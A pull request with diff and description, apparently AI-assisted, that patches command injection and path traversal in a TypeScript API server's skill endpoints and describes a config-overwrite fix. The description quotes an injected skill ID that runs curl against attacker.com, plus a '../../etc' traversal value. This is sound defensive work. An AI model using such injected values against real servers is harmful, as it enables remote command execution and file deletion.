### PR TITLE
fix: guard config overwrite + skill command injection & path traversal

### DIFF
--- a/src/api/server.ts
+++ b/src/api/server.ts
@@ -3090,6 +3090,10 @@ async function handleRequest(
   // ── POST /api/skills/:id/open ─────────────────────────────────────────
   if (method === "POST" && pathname.match(/^\/api\/skills\/[^/]+\/open$/)) {
     const skillId = decodeURIComponent(pathname.split("/")[3]);
+    if (!/^[a-z0-9][a-z0-9-]*$/.test(skillId)) {
+      error(res, "Invalid skill ID", 400);
+      return;
+    }
     const workspaceDir =
       state.config.agents?.defaults?.workspace ??
       resolveDefaultAgentWorkspaceDir();
@@ -3147,14 +3151,14 @@ async function handleRequest(
       return;
     }
 
-    const { exec } = await import("node:child_process");
-    const cmd =
+    const { execFile } = await import("node:child_process");
+    const opener =
       process.platform === "darwin"
-        ? `open "${skillPath}"`
+        ? "open"
         : process.platform === "win32"
-          ? `explorer "${skillPath}"`
-          : `xdg-open "${skillPath}"`;
-    exec(cmd, (err) => {
+          ? "explorer"
+          : "xdg-open";
+    execFile(opener, [skillPath], (err) => {
       if (err)
         logger.warn(
           `[milaidy-api] Failed to open skill folder: ${err.message}`,
@@ -3171,6 +3175,10 @@ async function handleRequest(
     !pathname.includes("/marketplace")
   ) {
     const skillId = decodeURIComponent(pathname.slice("/api/skills/".length));
+    if (!/^[a-z0-9][a-z0-9-]*$/.test(skillId)) {
+      error(res, "Invalid skill ID", 400);
+      return;
+    }
     const workspaceDir =
       state.config.agents?.defaults?.workspace ??
       resolveDefaultAgentWorkspaceDir();


### PR DESCRIPTION
## Summary

- **PUT /api/config unconstrained overwrite**: Previously used `Object.assign(state.config, body)` with zero validation — any JSON key was accepted and persisted to disk. An attacker could overwrite `mcp.servers` (arbitrary command exec), `env.vars` (API key theft), `hooks` (module loading RCE), `cloud.baseUrl` (SSRF), or inject `__proto__` (prototype pollution). Now enforces a top-level key allowlist matching `MilaidyConfig`, blocks prototype pollution keys, and uses recursive deep-merge to prevent wiping sibling keys on partial updates.

- **POST /api/skills/:id/open command injection**: `exec()` passed the skill path through a shell, so a crafted skill ID like `test$(curl attacker.com)` would execute arbitrary commands. Replaced with `execFile()` which bypasses shell interpretation entirely.

- **Path traversal in skill open + delete**: Neither endpoint validated the `skillId` from the URL. A `skillId` of `../../etc` would resolve to arbitrary filesystem paths. The DELETE endpoint is especially critical since it calls `fs.rmSync` with `recursive: true`. Added `/^[a-z0-9][a-z0-9-]*$/` regex validation matching the format already used by skill creation.

## Test plan

- [ ] Verify `PUT /api/config` still accepts valid config updates (e.g. `{"ui":{"theme":"dark"}}`)
- [ ] Verify `PUT /api/config` drops unknown keys (e.g. `{"malicious": true}`)
- [ ] Verify `PUT /api/config` blocks `__proto__` injection
- [ ] Verify `POST /api/skills/:id/open` rejects IDs with `../`, `$(cmd)`, or special chars
- [ ] Verify `DELETE /api/skills/:id` rejects malformed IDs
- [ ] Verify legitimate skill open/delete operations still work with valid IDs

🤖 Generated with [Claude Code](https://claude.com/claude-code)